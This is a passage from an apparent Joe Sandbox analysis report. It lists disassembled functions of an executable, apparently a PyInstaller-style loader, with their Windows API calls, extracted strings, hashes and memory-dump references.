                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E412BC6494DB03D2FB75DB04AC501B423A0EF24B51F9A54B9D90ED67A2EFBCB948C384
                                                                                                                                                                                                                                                    Function 00007FF69F3E6EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                    • API String ID: 190572456-3427451314
                                                                                                                                                                                                                                                    • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                                                    • Instruction ID: 22044e09ef0a460d40384809bbed444103ab68dfd6a6875267d173b08c204619
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9E1C46491DB0391FB35DB14BC041B423B5EF68B54F8A54B9C85ECA3A6EFBCB9488344
                                                                                                                                                                                                                                                    Function 00007FF69F3E77D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF69F3E3FA4,00000000,00007FF69F3E1925), ref: 00007FF69F3E86E9
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,00007FF69F3E7C97,?,?,FFFFFFFF,00007FF69F3E3834), ref: 00007FF69F3E782C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E26C0: MessageBoxW.USER32 ref: 00007FF69F3E2736
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                    • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                    • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                    • Opcode ID: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
                                                                                                                                                                                                                                                    • Instruction ID: 4320ec3d122115d2e19686d6fedc6dd3bf903b04210c58cc26eb8a70c90beb22
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE41C811F1C64382FB70EB25D8556F96361EF54780F464079EA6ECA6D6EF7CE9048380
                                                                                                                                                                                                                                                    Function 00007FF69F3E20F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                    • String ID: P%
                                                                                                                                                                                                                                                    • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                    • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                                                    • Instruction ID: 95869e3d890eec42fa76ee65f881548cb95429cb72ddca9c487b3b35a46c7f7f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F51E226618BA187D7389F22A4181BAB7A1FB98B61F044135EBDEC3785DF7CD185CB10
                                                                                                                                                                                                                                                    Function 00007FF69F3F55A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                    • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                    • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                                                    • Instruction ID: 1bf3bb53ecf6b918c15ebd3ba285b4c50eb69be15a2028d6ba64a5ba33f642f1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C12B322E0C24386FBF49B15D15427A7791FB40750FD6407AE69A8BEC4DF3CE990AB84
                                                                                                                                                                                                                                                    Function 00007FF69F3F02E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                    • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                    • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                                                    • Instruction ID: 050765d292ac2a195daed62d0239c872ebee277daafd3e47fe2fc3de8add7dec
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F912C6B2E1C143A6FBB05B18E15477E7391FB80754F8A407AD6998B6C4DF3CE480AB90
                                                                                                                                                                                                                                                    Function 00007FF69F3E1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                    • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                    • Opcode ID: 6c2c96a29d60f432f2b448254d07b01eb9fab63d38ba2328369ba170bbdd7169
                                                                                                                                                                                                                                                    • Instruction ID: 3d06287f5850f524b2c0d9f3fa02c2a45d8b602750a7a8452902e79957a38788
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c2c96a29d60f432f2b448254d07b01eb9fab63d38ba2328369ba170bbdd7169
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB41A122B0864683FB30AB12A8406BAA391FF55BC4F554079DD5DCF796DE7CE8058380
                                                                                                                                                                                                                                                    Function 00007FF69F3E1440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                    • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                    • Opcode ID: 7a6b146adfcb98e650bee18aa77db2fbb1ea6c7dd5ba6714b17be4e0a6b4b0dd
                                                                                                                                                                                                                                                    • Instruction ID: f69ba91c2c990b86384f7b5fb06afc35f8a582d5b0edda756104ac924e8cccbd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a6b146adfcb98e650bee18aa77db2fbb1ea6c7dd5ba6714b17be4e0a6b4b0dd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5419822B0864383FB30AB16E4405BA63A0FF54BD4F564075DE4DCBBA6EE7CE9458744
                                                                                                                                                                                                                                                    Function 00007FF69F3EDD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                    • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                                                    • Instruction ID: f69d9e1d192ccb9b2fbb4d5f8ffb37886e0568b03d067bf48ccf2b8da3836bfa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFD14E32A087418AEB309B65D4403BD77A0FF55798F124179EA8D9BB96CF3CE895C780
                                                                                                                                                                                                                                                    Function 00007FF69F3ECFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF69F3ED29A,?,?,?,00007FF69F3ECF8C,?,?,?,00007FF69F3ECB89), ref: 00007FF69F3ED06D
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF69F3ED29A,?,?,?,00007FF69F3ECF8C,?,?,?,00007FF69F3ECB89), ref: 00007FF69F3ED07B
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF69F3ED29A,?,?,?,00007FF69F3ECF8C,?,?,?,00007FF69F3ECB89), ref: 00007FF69F3ED0A5
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF69F3ED29A,?,?,?,00007FF69F3ECF8C,?,?,?,00007FF69F3ECB89), ref: 00007FF69F3ED113
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF69F3ED29A,?,?,?,00007FF69F3ECF8C,?,?,?,00007FF69F3ECB89), ref: 00007FF69F3ED11F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                    • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                                                    • Instruction ID: 48cd22835f8b953ec2ca16a0d7613fdcc1b68403ac6becf29c4fbb0c495c6dbd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A31C321B1AA42D2EE319B12A8006752394FF18BA4F5F0579DD1D8F384EF3CEC468344
                                                                                                                                                                                                                                                    Function 00007FF69F3FA460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                                                    • Opcode ID: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                                                                                                                                                                                                    • Instruction ID: 0e299699d5acd995f0500f1095647d295270b2412cb3e8b69911023a5c9ac8fc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16217C20B1C24242FEB8632156491793382DF48BB0F0647B8D83ECEBD6DE2CF4406781
                                                                                                                                                                                                                                                    Function 00007FF69F40707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                    • String ID: CONOUT$
                                                                                                                                                                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                    • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                                                    • Instruction ID: 19f40c42284aa753db73b3b14685f8d337ff1b1fb3abeac048ef194dd6657e04
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A116331B18B4686E7608B52E85432973A0FBA8FE4F094274EA6DC7795DF7CE424C744
                                                                                                                                                                                                                                                    Function 00007FF69F3E81F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF69F3E39F2), ref: 00007FF69F3E821D
                                                                                                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF69F3E39F2), ref: 00007FF69F3E827A
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF69F3E3FA4,00000000,00007FF69F3E1925), ref: 00007FF69F3E86E9
                                                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF69F3E39F2), ref: 00007FF69F3E8305
                                                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF69F3E39F2), ref: 00007FF69F3E8364
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,00000000,?,00007FF69F3E39F2), ref: 00007FF69F3E8375
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,00000000,?,00007FF69F3E39F2), ref: 00007FF69F3E838A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3462794448-0
                                                                                                                                                                                                                                                    • Opcode ID: 639de59220823cace7c77af6f37b7d772b01f3b75ea0781fa3cc2fa807537d27
